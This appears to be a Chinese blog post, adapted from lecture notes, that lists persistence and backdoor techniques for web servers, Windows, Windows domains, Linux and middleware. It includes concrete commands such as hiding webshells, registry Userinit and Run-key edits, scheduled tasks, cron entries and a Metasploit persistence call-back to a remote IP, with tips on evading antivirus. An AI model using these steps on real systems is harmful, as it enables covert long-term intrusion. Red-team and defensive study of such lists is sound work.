持久化的一些方法

之前讲了次课准备的,ppt就不放了,当时的思路搬运过来

---

需要思考的几个问题
1 返回路径 (网络出口,网络之间)
2 部署方式及免杀 (个人电脑,服务器,杀软)
3 痕迹清理
 
 


web相关
1 webshell
attrib +s +h test.php  隐藏test.php文件
attrib命令 用于修改文件属性
+s 设置系统文件属性
+h 设置隐藏属性
.user.ini
auto_append_file = 1.gif
user_ini.cache_ttl = 10
 
auto_append_file    包含要执行的文件
user_ini.cache_ttl  重新读取用户 INI 文件的间隔时间
2 代码修改
 

windows
1 程序替换
shift后门
替换不常用服务程序
对于开源软件,重新编译目标使用的程序,比如notepad++,mysql
程序内插入shellcode         shellter
2 rid hijack(账户克隆)
3 注册表映像劫持
Gflags.exe
 
4 自启动
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
msf persistence
run persistence -X -i 5 -p 4445 -r 1.1.1.1
 
缺点:容易被杀软发现
优点:种植容易
注册表路径: HKCU\Environment\
创建字符串键值: UserInitMprLogonScript
键值设置为bat的绝对路径:D:\工作\1.bat
 
因为Logon Scripts是优先于很多杀毒软件启动(部分杀毒是优先于他启动)的,所以可以通过这种方式将powershell命令写到bat脚本中,达到免杀隐藏启动的效果
 
优点:免杀效果比较好
缺点:隐蔽性相对较弱,因为存在后门文件。
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
 
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\WINDOWS NT\CurrentVersion\Winlogon" -name Userinit -value "C:\Windows\system32\userinit.exe,xxxxx"
 
这种方法可以实现无文件落地,直接执行powershell命令,并且他也是优于杀毒软件进行启动的
 
缺点:权限要求较高
优点:无文件落地,隐蔽性,免杀性较好。
开始菜单启动项
开始菜单启动项
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
5 计划任务
schtasks.exe /Create /TN update /TR xx(你要执行的命令) /SC ONLOGON /F /RL HIGHEST
不一定要启动时
 
优点:一般杀毒软件不会拦截这条命令
缺点:后门存在于系统当中,并且需要做免杀。
 
6 CLR劫持
优点:无需管理员权限,并能够劫持所有.Net程序。更重要的是,系统默认会调用.net程序,导致后门自动触发
 
7 com对象劫持
劫持CAccPropServicesClass以及MMDeviceEnumerator
优点:相对于CLR劫持.net,此方法无需重启。
系统很多正常程序启动时需要调用这两个实例,所以,这就可以用作后门来使用,并且,该方法也能够绕过Autoruns对启动项的检测。
 
 
MruPidlList
COM对象MruPidlList,作用于shell32.dll,shell32.dll用于打开网页和文件,所以当系统启动时必定会执行
 
8 waitfor
waitfor heheda & echo 1
waitfor /s 1.1.1.1 /si heheda
 
9 office劫持
Office在启动过程中,会自动加载C:\Users\xxx\AppData\Roaming\Microsoft\Word\Startup文件夹中的dll
 
10 junction folder
11 windows库
12 程序插件和扩展
13 DLL劫持
14 wmi事件
 

 
windows域相关
1 golden ticket
2 skeleton key
3 dsrm
4 sid history
5 ACL后门
6 silver ticket
7 msdtc加载后门
8 dump hash
9 隐蔽的dcshadow
10 恶意SSP
11 Hook PasswordChangeNotify

 
linux
1 计划任务
ehco "*/2 * * * * ./test”>filename.txt 
crontab filename.txt
 
除了最常见的crontab还有
at
anacron
2 ssh软连接后门
3 ssh wrapper
4 rootkit
5 suid shell
6 利用alias
7 pam认证机制后门
8 PROMPT_COMMAND后门
9 写入公钥
10 suid shell
11 inetd.conf

 
中间件
1 php扩展后门
2 apache模块后门
3 mysql
4 mssql
5 iis
6 tomcat
 
posted @ 2019-11-01 00:39  君莫笑hhhhhh  阅读(492)  评论(0编辑  收藏  举报